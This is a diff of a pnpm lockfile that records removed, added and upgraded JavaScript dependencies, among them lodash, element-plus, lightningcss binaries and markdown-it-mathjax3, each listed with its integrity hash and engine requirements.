character-entities-legacy@3.0.0: resolution: {integrity: sha512-RpPp0asT/6ufRm//AJVwpViZbGM/MkjQFxJccQRHmISF/22NBtsHqAWmL+/pmkPWoIUJdWyeVleTl1wydHATVQ==} - cheerio-select@1.6.0: - resolution: {integrity: sha512-eq0GdBvxVFbqWgmCm7M3XGs1I8oLy/nExUnh6oLqmBditPO9AqQJrkslDpMun/hZ0yyTs8L0m85OHp4ho6Qm9g==} - - cheerio@1.0.0-rc.10: - resolution: {integrity: sha512-g0J0q/O6mW8z5zxQ3A8E8J1hUgp4SMOvEoW/x84OwyHKe/Zccz83PVT4y5Crcr530FV6NgmKI1qvGTKVl9XXVw==} - engines: {node: '>= 6'} - chokidar@3.6.0: resolution: {integrity: sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==} engines: {node: '>= 8.10.0'} - comma-separated-tokens@2.0.3: - resolution: {integrity: sha512-Fu4hJdvzeylCfQPp9SGWidpzrMs7tTrlu6Vb8XGaRGck8QSNZJJp538Wrb60Lax4fPwR64ViY468OIUTbRlGZg==} + chokidar@5.0.0: + resolution: {integrity: sha512-TQMmc3w+5AxjpL8iIiwebF73dRDF4fBIieAqGn9RGCWaEVwQ6Fb2cGe31Yns0RRIzii5goJ1Y7xbMwo1TxMplw==} + engines: {node: '>= 20.19.0'} - commander@13.1.0: - resolution: {integrity: sha512-/rFeCpNJQbhSZjGVwO9RFV3xPqbnERS8MmIQzCtD/zl6gpJuV/bMLuN92oG3F7d8oDEHHRrujSXNUr8fpjntKw==} - engines: {node: '>=18'} + citty@0.1.6: + resolution: {integrity: sha512-tskPPKEs8D2KPafUypv2gxwJP8h/OaJmC82QQGGDQcHvXX43xF2VDACcJVmZ0EuSxkpO9Kc4MlrA3q0+FG58AQ==} - commander@6.2.1: - resolution: {integrity: sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==} - engines: {node: '>= 6'} + comma-separated-tokens@2.0.3: + resolution: {integrity: sha512-Fu4hJdvzeylCfQPp9SGWidpzrMs7tTrlu6Vb8XGaRGck8QSNZJJp538Wrb60Lax4fPwR64ViY468OIUTbRlGZg==} commander@7.2.0: resolution: {integrity: sha512-QrWXB+ZQSVPmIWIhtEO9H+gwHaMGYiF5ChvoJ+K9ZGHG/sVsa6yiesAD1GC/x46sET00Xlwo1u49RVVVzvcSkw==} engines: {node: '>= 10'} + confbox@0.1.8: + resolution: {integrity: sha512-RMtmw0iFkeR4YV+fUOSucriAQNb9g8zFR52MWCtl+cCZOFRNL6zeB395vPzFhEjjn4fMxXudmELnl/KF/WrK6w==} + + confbox@0.2.4: + resolution: {integrity: sha512-ysOGlgTFbN2/Y6Cg3Iye8YKulHw+R2fNXHrgSmXISQdMnomY6eNDprVdW9R5xBguEqI954+S6709UyiO7B+6OQ==} + + consola@3.4.2: + resolution: {integrity: sha512-5IKcdX0nnYavi6G7TtOhwkYzyjfJlatbjMjuLSfE2kYT5pMDOilZ4OvMhi637CcDICTmz3wARPoyhqyX1Y+XvA==} + engines: {node: ^14.18.0 || >=16.10.0} + copy-anything@4.0.5: resolution: {integrity: sha512-7Vv6asjS4gMOuILabD3l739tsaxFQmC+a7pLZm02zyvs8p977bL3zEgq3yDk5rn9B0PbYgIv++jmHcuUab4RhA==} engines: {node: '>=18'} - css-select@4.3.0: - resolution: {integrity: sha512-wPpOYtnsVontu2mODhA19JrqWxNsfdatRKd64kmpRbQgh1KtItko5sTnEpPdpSaJszTOhEMlF/RPz28qj4HqhQ==} - css-select@5.2.2: resolution: {integrity: sha512-TizTzUddG/xYLA3NXodFM0fSbNizXjOKhqiQQwvhlspadZokn1KDy0NZFS0wuEubIYAV5/c1/lAr0TaaFXEXzw==} @@ -869,11 +1137,8 @@ packages: csstype@3.2.3: resolution: {integrity: sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==} - dayjs@1.11.19: - resolution: {integrity: sha512-t5EcLVS6QPBNqM2z8fakk/NKel+Xzshgt8FFKAn+qwlD1pzZWxh0nVCrvFK7ZDb6XucZeF9z8C7CBWTRIVApAw==} - - de-indent@1.0.2: - resolution: {integrity: sha512-e/1zu3xH5MQryN2zdVaF0OrdNLUbvWxzMbi+iNA6Bky7l1RoP8a2fIbRocyHclXt/arDrrR6lL3TqFD9pMQTsg==} + dayjs@1.11.21: + resolution: {integrity: sha512-98IT+HOahAisibz/yjKbzuOBwYcjJ7BCLPzARyHiyEBmRz4fatF+KPJszEHXsGYjUG234aH/cOjW1wwTbKUZlA==} debug@4.4.3: resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} @@ -884,51 +1149,48 @@ packages: supports-color: optional: true + defu@6.1.7: + resolution: {integrity: sha512-7z22QmUWiQ/2d0KkdYmANbRUVABpZ9SNYyH5vx6PZ+nE5bcC0l7uFvEfHlyld/HcGBFTL536ClDt3DEcSlEJAQ==} + dequal@2.0.3: resolution: {integrity: sha512-0je+qPKHEMohvfRTCEo3CrPG6cAzAYgmzKyxRiYSSDkS6eGJdyVJm7WaYA5ECaAD9wLB2T4EEeymA5aFVcYXCA==} engines: {node: '>=6'} + destr@2.0.5: + resolution: {integrity: sha512-ugFTXCtDZunbzasqBxrK93Ik/DRYsO6S/fedkWEMKqt04xZ4csmnmwGDBAb07QWNaGMAmnTIemsYZCksjATwsA==} + + detect-libc@2.1.2: + resolution: {integrity: sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==} + engines: {node: '>=8'} + devlop@1.1.0: resolution: {integrity: sha512-RWmIqhcFf1lRYBvNmr7qTNuyCt/7/ns2jbpp1+PalgE/rDQcBT0fioSMUpJ93irlUhC5hrg4cYqe6U+0ImW0rA==} - dom-serializer@1.4.1: - resolution: {integrity: sha512-VHwB3KfrcOOkelEG2ZOfxqLZdfkil8PtJi4P8N2MMXucZq2yLp75ClViUlOVwyoHEDjYU433Aq+5zWP61+RGag==} - dom-serializer@2.0.0: resolution: {integrity: sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==} domelementtype@2.3.0: resolution: {integrity: sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==} - domhandler@3.3.0: - resolution: {integrity: sha512-J1C5rIANUbuYK+FuFL98650rihynUOEzRLxW+90bKZRWB6A1X1Tf82GxR1qAWLyfNPRvjqfip3Q5tdYlmAa9lA==} - engines: {node: '>= 4'} - - domhandler@4.3.1: - resolution: {integrity: sha512-GrwoxYN+uWlzO8uhUXRl0P+kHE4GtVPfYzVLcUxPL7KNdHKj66vvlhiweIHqYYXWlw+T8iLMp42Lm67ghw4WMQ==} - engines: {node: '>= 4'} - domhandler@5.0.3: resolution: {integrity: sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==} engines: {node: '>= 4'} - domutils@2.8.0: - resolution: {integrity: sha512-w96Cjofp72M5IIhpjgobBimYEfoPjx1Vx0BSX9P30WBdZW2WIKU0T1Bd0kz2eNZ9ikjKgHbEyKx8BB6H1L3h3A==} - domutils@3.2.2: resolution: {integrity: sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw==} - element-plus@2.13.3: - resolution: {integrity: sha512-RwLVtFpeHjZ4UCtHxVi1/sGR2cr2xOL7hqWa7qJc/+gdO6QavVG8Nw1C647obCb3tIg2ztMhNbIIjZUv+6z1og==} + dotenv@17.4.2: + resolution: {integrity: sha512-nI4U3TottKAcAD9LLud4Cb7b2QztQMUEfHbvhTH09bqXTxnSie8WnjPALV/WMCrJZ6UV/qHJ6L03OqO3LcdYZw==} + engines: {node: '>=12'} + + element-plus@2.14.2: + resolution: {integrity: sha512-eNH9uP3wQoNqieEIHXiNvIVv+zO5sZDU0CAZq5b0zqSN06DD0/V9xIq1R/qm3rw5k3nBTM1JvpxhCfRbaFLzDQ==} peerDependencies: - vue: ^3.3.0 + vue: ^3.3.7 emoji-regex-xs@1.0.0: resolution: {integrity: sha512-LRlerrMYoIDrT6jgpeZ2YYl/L8EulRTt5hQcYjy5AInh7HWXKimpqx68aknBFpGL2+/IcogTcaydJEgaTmOpDg==} - entities@2.2.0: - resolution: {integrity: sha512-p92if5Nz619I0w+akJrLZH0MX0Pb5DX39XOwQTtXSdQQOaYH03S1uIQp4mhOZtAXrxq4ViO67YTiLBo2638o9A==} - entities@4.5.0: resolution: {integrity: sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==} engines: {node: '>=0.12'} @@ -937,25 +1199,39 @@ packages: resolution: {integrity: sha512-TWrgLOFUQTH994YUyl1yT4uyavY5nNB5muff+RtWaqNVCAK408b5ZnnbNAUEWLTCpum9w6arT70i1XdQ4UeOPA==} engines: {node: '>=0.12'} - es-module-lexer@1.7.0: - resolution: {integrity: sha512-jEQoCwk8hyb2AZziIOLhDqpm5+2ww5uIE6lkO/6jcOCusfk6LhMHpXXfBLXTZ7Ydyt0j4VoUQv6uGNYbdW+kBA==} + errx@0.1.0: + resolution: {integrity: sha512-fZmsRiDNv07K6s2KkKFTiD2aIvECa7++PKyD5NC32tpRw46qZA3sOz+aM+/V9V0GDHxVTKLziveV4JhzBHDp9Q==} + + es-module-lexer@2.3.0: + resolution: {integrity: sha512-KLdwQm2NvGLDkQDCGvmiQrhkd0JbMzXthwQAUgWjQuQdBLFa3eiBP5arXZyA+f8x+x7OXgud6bq2rxjGtHV2tw==} esbuild@0.21.5: resolution: {integrity: sha512-mg3OPMV4hXywwpoDxu3Qda5xCKQi+vCTZq8S9J/EpkhB2HzKXq4SNFZE3+NK93JYxc8VMSep+lOUSC/RVKaBqw==} engines: {node: '>=12'} hasBin: true - escape-goat@3.0.0: - resolution: {integrity: sha512-w3PwNZJwRxlp47QGzhuEBldEqVHHhh8/tIPcl6ecf2Bou99cdAt0knihBV0Ecc7CGxYduXVBDheH1K2oADRlvw==} - engines: {node: '>=10'} - - esm@3.2.25: - resolution: {integrity: sha512-U1suiZ2oDVWv4zPO56S0NcR5QriEahGtdN2OR6FiOG4WJvcjBVFB0qI4+eKoWFH483PKGuLuu6V8Z4T5g63UVA==} - engines: {node: '>=6'} + escape-string-regexp@5.0.0: + resolution: {integrity: sha512-/veY75JbMK4j1yjvuUxuVsiS/hr/4iHs9FTT6cgTexxdE0Ly/glccBAkloH/DofkjRbZU3bnoj38mOmhkZ0lHw==} + engines: {node: '>=12'} estree-walker@2.0.2: resolution: {integrity: sha512-Rfkk/Mp/DL7JVje3u18FxFujQlTNR2q6QfMSMB7AvCBx91NGj/ba3kCfza0f6dVDbw7YlRf/nDrn7pQrCCyQ/w==} + estree-walker@3.0.3: + resolution: {integrity: sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==} + + exsolve@1.1.0: + resolution: {integrity: sha512-D+42+T12DdIlJM3uepa55qGiL3sYdLBOxIl2ifQCzCHz4c7eiolaHsi3BIqEr7JxBzxv2pYZQX9kw16ziMcEmw==} + + fdir@6.5.0: + resolution: {integrity: sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==} + engines: {node: '>=12.0.0'} + peerDependencies: + picomatch: ^3 || ^4 + peerDependenciesMeta: + picomatch: + optional: true + fill-range@7.1.1: resolution: {integrity: sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==} engines: {node: '>=8'} @@ -968,6 +1244,10 @@ packages: engines: {node: ^8.16.0 || ^10.6.0 || >=11.0.0} os: [darwin] + giget@3.3.0: + resolution: {integrity: sha512-gzi2D96p+AMfDcmJHGDj3KJ9NRiwvlFAU5yfa3ROwWZmFUjX4P43x3BcyRaOMMLto1vUo7C+86+MFhYTl6Ryiw==} + hasBin: true + giscus@1.6.0: resolution: {integrity: sha512-Zrsi8r4t1LVW950keaWcsURuZUQwUaMKjvJgTCY125vkW6OiEBkatE7ScJDbpqKHdZwb///7FVC21SE3iFK3PQ==} @@ -985,27 +1265,21 @@ packages: hast-util-whitespace@3.0.0: resolution: {integrity: sha512-88JUN06ipLwsnv+dVn+OIYOvAuvBMy/Qoi6O7mQHxdPXpjy+Cd6xRkWwux7DKO+4sYILtLBRIKgsdpS2gQc7qw==} - he@1.2.0: - resolution: {integrity: sha512-F/1DnUGPopORZi0ni+CvrCgHQ5FyEAHRLSApuYWMmrbSwoN2Mn/7k+Gl38gJnR7yyDZk6WLXwiGod1JOWNDKGw==} - hasBin: true - hookable@5.5.3: resolution: {integrity: sha512-Yc+BQe8SvoXH1643Qez1zqLRmbA5rCL+sSmk6TVos0LWVfNIB7PGncdlId77WzLGSIB5KaWgTaNTs2lNVEI6VQ==} html-void-elements@3.0.0: resolution: {integrity: sha512-bEqo66MRXsUGxWHV5IP0PUiAWwoEjba4VCzg0LjFJBpchPaTfyfCKTG6bc5F8ucKec3q5y6qOdGyYTSBEvhCrg==} - htmlparser2@5.0.1: - resolution: {integrity: sha512-vKZZra6CSe9qsJzh0BjBGXo8dvzNsq/oGvsjfRdOrrryfeD9UOBEEQdeoqCRmKZchF5h2zOBMQ6YuQ0uRUmdbQ==} - - htmlparser2@6.1.0: - resolution: {integrity: sha512-gyyPk6rgonLFEDGoeRgQNaEUvdJ4ktTmmUh/h2t7s+M8oPpIPxgNACWa+6ESR57kXstwqPiCut0V8NRpcwgU7A==} - ignore-by-default@1.0.1: resolution: {integrity: sha512-Ius2VYcGNk7T90CppJqcIkS5ooHUZyIQK+ClZfMfMNFEF9VSE73Fq+906u/CWu92x4gzZMWOwfFYckPObzdEbA==} - immutable@4.3.8: - resolution: {integrity: sha512-d/Ld9aLbKpNwyl0KiM2CT1WYvkitQ1TSvmRtkcV8FKStiDoA7Slzgjmb/1G2yhKM1p0XeNOieaTbFZmU1d3Xuw==} + ignore@7.0.5: + resolution: {integrity: sha512-Hs59xBNfUIunMFgWAbGX5cq6893IbWg4KnrjbYwX3tx0ztorVgTDA6B2sxf8ejHJ4wz8BqGUMYlnzNBer5NvGg==} + engines: {node: '>= 4'} + + immutable@5.1.9: + resolution: {integrity: sha512-m8nVez3rwrgmWxtLMt1ZYXB2Lv7OKYn/disyxAlSDYAlKSlFoPPfIAmAM/M5xqL4m4C/wAPw7S2/CNaUii1Hxg==} is-binary-path@2.1.0: resolution: {integrity: sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==} @@ -1027,22 +1301,102 @@ packages: resolution: {integrity: sha512-oG7cgbmg5kLYae2N5IVd3jm2s+vldjxJzK1pcu9LfpGuQ93MQSzo0okvRna+7y5ifrD+20FE8FvjusyGaz14fw==} engines: {node: '>=18'} - juice@8.1.0: - resolution: {integrity: sha512-FLzurJrx5Iv1e7CfBSZH68dC04EEvXvvVvPYB7Vx1WAuhCp1ZPIMtqxc+WTWxVkpTIC2Ach/GAv0rQbtGf6YMA==} - engines: {node: '>=10.0.0'} + jiti@2.7.0: + resolution: {integrity: sha512-AC/7JofJvZGrrneWNaEnJeOLUx+JlGt7tNa0wZiRPT4MY1wmfKjt2+6O2p2uz2+skll8OZZmJMNqeke7kKbNgQ==} hasBin: true + klona@2.0.6: + resolution: {integrity: sha512-dhG34DXATL5hSxJbIexCft8FChFXtmskoZYnoPWjXQuebWYCNkVeV3KkGegCK9CP1oswI/vQibS2GY7Em/sJJA==} + engines: {node: '>= 8'} + + knitwork@1.3.0: + resolution: {integrity: sha512-4LqMNoONzR43B1W0ek0fhXMsDNW/zxa1NdFAVMY+k28pgZLovR4G3PB5MrpTxCy1QaZCqNoiaKPr5w5qZHfSNw==} + + lightningcss-android-arm64@1.32.0: + resolution: {integrity: sha512-YK7/ClTt4kAK0vo6w3X+Pnm0D2cf2vPHbhOXdoNti1Ga0al1P4TBZhwjATvjNwLEBCnKvjJc2jQgHXH0NEwlAg==} + engines: {node: '>= 12.0.0'} + cpu: [arm64] + os: [android] + + lightningcss-darwin-arm64@1.32.0: + resolution: {integrity: sha512-RzeG9Ju5bag2Bv1/lwlVJvBE3q6TtXskdZLLCyfg5pt+HLz9BqlICO7LZM7VHNTTn/5PRhHFBSjk5lc4cmscPQ==} + engines: {node: '>= 12.0.0'} + cpu: [arm64] + os: [darwin] + + lightningcss-darwin-x64@1.32.0: + resolution: {integrity: sha512-U+QsBp2m/s2wqpUYT/6wnlagdZbtZdndSmut/NJqlCcMLTWp5muCrID+K5UJ6jqD2BFshejCYXniPDbNh73V8w==} + engines: {node: '>= 12.0.0'} + cpu: [x64] + os: [darwin] + + lightningcss-freebsd-x64@1.32.0: + resolution: {integrity: sha512-JCTigedEksZk3tHTTthnMdVfGf61Fky8Ji2E4YjUTEQX14xiy/lTzXnu1vwiZe3bYe0q+SpsSH/CTeDXK6WHig==} + engines: {node: '>= 12.0.0'} + cpu: [x64] + os: [freebsd] + + lightningcss-linux-arm-gnueabihf@1.32.0: + resolution: {integrity: sha512-x6rnnpRa2GL0zQOkt6rts3YDPzduLpWvwAF6EMhXFVZXD4tPrBkEFqzGowzCsIWsPjqSK+tyNEODUBXeeVHSkw==} + engines: {node: '>= 12.0.0'} + cpu: [arm] + os: [linux] + + lightningcss-linux-arm64-gnu@1.32.0: + resolution: {integrity: sha512-0nnMyoyOLRJXfbMOilaSRcLH3Jw5z9HDNGfT/gwCPgaDjnx0i8w7vBzFLFR1f6CMLKF8gVbebmkUN3fa/kQJpQ==} + engines: {node: '>= 12.0.0'} + cpu: [arm64] + os: [linux] + libc: [glibc] + + lightningcss-linux-arm64-musl@1.32.0: + resolution: {integrity: sha512-UpQkoenr4UJEzgVIYpI80lDFvRmPVg6oqboNHfoH4CQIfNA+HOrZ7Mo7KZP02dC6LjghPQJeBsvXhJod/wnIBg==} + engines: {node: '>= 12.0.0'} + cpu: [arm64] + os: [linux] + libc: [musl] + + lightningcss-linux-x64-gnu@1.32.0: + resolution: {integrity: sha512-V7Qr52IhZmdKPVr+Vtw8o+WLsQJYCTd8loIfpDaMRWGUZfBOYEJeyJIkqGIDMZPwPx24pUMfwSxxI8phr/MbOA==} + engines: {node: '>= 12.0.0'} + cpu: [x64] + os: [linux] + libc: [glibc] + + lightningcss-linux-x64-musl@1.32.0: + resolution: {integrity: sha512-bYcLp+Vb0awsiXg/80uCRezCYHNg1/l3mt0gzHnWV9XP1W5sKa5/TCdGWaR/zBM2PeF/HbsQv/j2URNOiVuxWg==} + engines: {node: '>= 12.0.0'} + cpu: [x64] + os: [linux] + libc: [musl] + + lightningcss-win32-arm64-msvc@1.32.0: + resolution: {integrity: sha512-8SbC8BR40pS6baCM8sbtYDSwEVQd4JlFTOlaD3gWGHfThTcABnNDBda6eTZeqbofalIJhFx0qKzgHJmcPTnGdw==} + engines: {node: '>= 12.0.0'} + cpu: [arm64] + os: [win32] + + lightningcss-win32-x64-msvc@1.32.0: + resolution: {integrity: sha512-Amq9B/SoZYdDi1kFrojnoqPLxYhQ4Wo5XiL8EVJrVsB8ARoC1PWW6VGtT0WKCemjy8aC+louJnjS7U18x3b06Q==} + engines: {node: '>= 12.0.0'} + cpu: [x64] + os: [win32] + + lightningcss@1.32.0: + resolution: {integrity: sha512-NXYBzinNrblfraPGyrbPoD19C1h9lfI/1mzgWYvXUTe414Gz/X1FD2XBZSZM7rRTrMA8JL3OtAaGifrIKhQ5yQ==} + engines: {node: '>= 12.0.0'} + lit-element@4.2.2: resolution: {integrity: sha512-aFKhNToWxoyhkNDmWZwEva2SlQia+jfG0fjIWV//YeTaWrVnOxD89dPKfigCUspXFmjzOEUQpOkejH5Ly6sG0w==} - lit-html@3.3.2: - resolution: {integrity: sha512-Qy9hU88zcmaxBXcc10ZpdK7cOLXvXpRoBxERdtqV9QOrfpMZZ6pSYP91LhpPtap3sFMUiL7Tw2RImbe0Al2/kw==} + lit-html@3.3.3: + resolution: {integrity: sha512-el8M6jK2o3RXBnrSHX3ZKrsN8zEV63pSExTO1wYJz7QndGYZ8353e2a5PPX+qHe2aGayfnchQmkAojaWAREOIA==} - lit@3.3.2: - resolution: {integrity: sha512-NF9zbsP79l4ao2SNrH3NkfmFgN/hBYSQo90saIVI1o5GpjAdCPVstVzO1MrLOakHoEhYkrtRjPK6Ob521aoYWQ==} + lit@3.3.3: + resolution: {integrity: sha512-fycuvZg/hkpozL00lm1pEJH5nN/lr9ZXd6mJI2HSN4+Bzc+LDNdEApJ6HFbPkdFNHLvOplIIuJvxkS4XUxqirw==} - lodash-es@4.17.23: - resolution: {integrity: sha512-kVI48u3PZr38HdYz98UmfPnXl2DXrpdctLrFLCd3kOx1xUkOmpFPx7gCWWM5MPkL/fD8zb+Ph0QzjGFs4+hHWg==} + lodash-es@4.18.1: + resolution: {integrity: sha512-J8xewKD/Gk22OZbhpOVSwcs60zhd95ESDwezOFuA3/099925PdHJ7OFHNTGtajL3AlZkykD32HykiMo+BIBI8A==} lodash-unified@1.0.3: resolution: {integrity: sha512-WK9qSozxXOD7ZJQlpSqOT+om2ZfcT4yO+03FuzAHD0wF6S0l0090LRPDx3vhTTLZ8cFKpBn+IOcVXK6qOcIlfQ==} @@ -1051,8 +1405,8 @@ packages: lodash: '*' lodash-es: '*' - lodash@4.17.23: - resolution: {integrity: sha512-LgVTMpQtIopCi79SJeDiP0TfWi5CNEc/L/aRdTh3yIvmZXTnheWpKjSZhnvMl8iXbC1tFg9gdHHDMLoV7CnG+w==} + lodash@4.18.1: + resolution: {integrity: sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==} magic-string@0.30.21: resolution: {integrity: sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==} @@ -1060,12 +1414,11 @@ packages: mark.js@8.11.1: resolution: {integrity: sha512-1I+1qpDt4idfgLQG+BNWmrqku+7/2bi5nLf4YwF8y8zXvmfiTBY3PV3ZibfrjBueCByROpuBjLLFCajqkgYoLQ==} - markdown-it-mathjax3@4.3.2: - resolution: {integrity: sha512-TX3GW5NjmupgFtMJGRauioMbbkGsOXAAt1DZ/rzzYmTHqzkO1rNAdiMD4NiruurToPApn2kYy76x02QN26qr2w==} + markdown-it-mathjax3@5.2.0: + resolution: {integrity: sha512-R+XAy5/7vSGuhG9Z0/cJm6zKxOzStcScfSKVwoarh4nBra+v1KClvbALr/xFTEe9iQhwfQM4SJnO68LXL+btMA==} - mathjax-full@3.2.2: - resolution: {integrity: sha512-+LfG9Fik+OuI8SLwsiR02IVdjcnRCy5MufYLi0C3TdMT56L/pjB0alMVGgoWJF8pN9Rc7FESycZB9BMNWIid5w==} - deprecated: Version 4 replaces this package with the scoped package @mathjax/src + mathxyjax3@0.8.3: + resolution: {integrity: sha512-eXjFaiyQsTdVOeTFoFaFJ/r1FITpB1f9c5MW4FETfcoVV/+xa5SD9pS05AwugzL/gNuDtWXrTOSmoD2e0Du+UA==} mdast-util-to-hast@13.2.1: resolution: {integrity: sha512-cctsq2wp5vTsLIcaymblUriiTcZd0CwWtCbLvrOzYCDZoWyMNV8sZ7krj09FSnsiJi3WVsHLM4k6Dq/yaPyCXA==} @@ -1079,12 +1432,6 @@ packages: memoize-one@6.0.0: resolution: {integrity: sha512-rkpe71W0N0c0Xz6QD0eJETuWAJGnJ9afsl1srmwPrI+yBCkge5EycXXbYRyvL29zZVUWQCY7InPRCv3GDXuZNw==} - mensch@0.3.4: - resolution: {integrity: sha512-IAeFvcOnV9V0Yk+bFhYR07O3yNina9ANIN5MoXBKYJ/RLYPurd2d0yw14MDhpr9/momp0WofT1bPUh3hkzdi/g==} - - mhchemparser@4.2.1: - resolution: {integrity: sha512-kYmyrCirqJf3zZ9t/0wGgRZ4/ZJw//VwaRVGA75C4nhE60vtnIzhl9J9ndkX/h6hxSN7pjg/cE0VxbnNM+bnDQ==} - micromark-util-character@2.1.1: resolution: {integrity: sha512-wv8tdUTJ3thSFFFJKtpYKOYiGP2+v96Hvk4Tu8KpCAsTMs6yi+nVmGh1syvSCsaxz45J6Jbw+9DD6g97+NV67Q==} @@ -1100,27 +1447,18 @@ packages: micromark-util-types@2.0.2: resolution: {integrity: sha512-Yw0ECSpJoViF1qTU4DC6NwtC4aWGt1EkzaQB8KPPyCRR8z9TWeV0HbEFGTO+ZY1wB22zmxnJqhPyTpOVCpeHTA==} - mime@2.6.0: - resolution: {integrity: sha512-USPkMeET31rOMiarsBNIHZKLGgvKc/LrjofAnBlOttf5ajRvqiRA8QsenbcooctK6d6Ts6aqZXBA+XbkKthiQg==} - engines: {node: '>=4.0.0'} - hasBin: true - - minimatch@10.2.3: - resolution: {integrity: sha512-Rwi3pnapEqirPSbWbrZaa6N3nmqq4Xer/2XooiOKyV3q12ML06f7MOuc5DVH8ONZIFhwIYQ3yzPH4nt7iWHaTg==} + minimatch@10.2.5: + resolution: {integrity: sha512-MULkVLfKGYDFYejP07QOurDLLQpcjk7Fw+7jXS2R2czRQzR56yHRveU5NDJEOviH+hETZKSkIk5c+T23GjFUMg==} engines: {node: 18 || 20 || >=22} - minimatch@9.0.7: - resolution: {integrity: sha512-MOwgjc8tfrpn5QQEvjijjmDVtMw2oL88ugTevzxQnzRLm6l3fVEF2gzU0kYeYYKD8C66+IdGX6peJ4MyUlUnPg==} - engines: {node: '>=16 || 14 >=14.17'} - minisearch@7.2.0: resolution: {integrity: sha512-dqT2XBYUOZOiC5t2HRnwADjhNS2cecp9u+TJRiJ1Qp/f5qjkeT5APcGPjHw+bz89Ms8Jp+cG4AlE+QZ/QnDglg==} mitt@3.0.1: resolution: {integrity: sha512-vKivATfr97l2/QBCYAkXYDbrIWPM2IIKEl7YPhjCvKlG3kE2gm+uBo6nEXK3M5/Ffh/FLpKExzOQ3JJoJGFKBw==} - mj-context-menu@0.6.1: - resolution: {integrity: sha512-7NO5s6n10TIV96d4g2uDpG7ZDpIhMh0QNfGdJw/W47JswFcosz457wqz/b5sAKvl12sxINGFCn80NZHKwxQEXA==} + mlly@1.8.2: + resolution: {integrity: sha512-d+ObxMQFmbt10sretNDytwt85VrbkhhUA/JBGm1MPaWJ65Cl4wOgLaB1NYvJSZ0Ef03MMEU/0xpPMXUIQ29UfA==} ms@2.1.3: resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==} @@ -1128,19 +1466,13 @@ packages: muggle-string@0.4.1: resolution: {integrity: sha512-VNTrAak/KhO2i8dqqnqnAHOa3cYBwXEZe9h+D5h/1ZqFSTEFHdM65lR7RoIqq3tBBYavsOXV84NoHXZ0AkPyqQ==} - nanoid@3.3.11: - resolution: {integrity: sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==} + nanoid@3.3.15: + resolution: {integrity: sha512-y7Wygv/7mEOvxTuEQDB8StXdMRBWf1kR/tlhAzBRUFkB2jfcLOAxO/SHmOO2zgz1pVgK29/kyupn059/bCHdjA==} engines: {node: ^10 || ^12 || ^13.7 || ^14 || >=15.0.1} hasBin: true - node-fetch@2.7.0: - resolution: {integrity: sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==} - engines: {node: 4.x || >=6.0.0} - peerDependencies: - encoding: ^0.1.0 - peerDependenciesMeta: - encoding: - optional: true + node-addon-api@7.1.1: + resolution: {integrity: sha512-5m3bsyrjFWE1xf7nz7YXdN4udnVtXK6/Yfgn5qnahL6bCkf2yKt4k3nuTKAtT4r3IG8JNR2ncsIMdZuAzJjHQQ==} nodemon@3.1.14: resolution: {integrity: sha512-jakjZi93UtB3jHMWsXL68FXSAosbLfY0In5gtKq3niLSkrWznrVBzXFNOEMJUfc9+Ke7SHWoAZsiMkNP3vq6Jw==} @@ -1157,54 +1489,70 @@ packages: nth-check@2.1.1: resolution: {integrity: sha512-lqjrjmaOoAnWfMmBPL+XNnynZh2+swxiX3WUE0s4yEHI6m+AwrK2UZOimIRl3X/4QctVqS8AiZjFqyOGrMXb/w==} + ohash@2.0.11: + resolution: {integrity: sha512-RdR9FQrFwNBNXAr4GixM8YaRZRJ5PUWbKYbE5eOsrwAjJW0q2REGcf79oYPsLyskQCZG1PLN+S/K1V00joZAoQ==} + 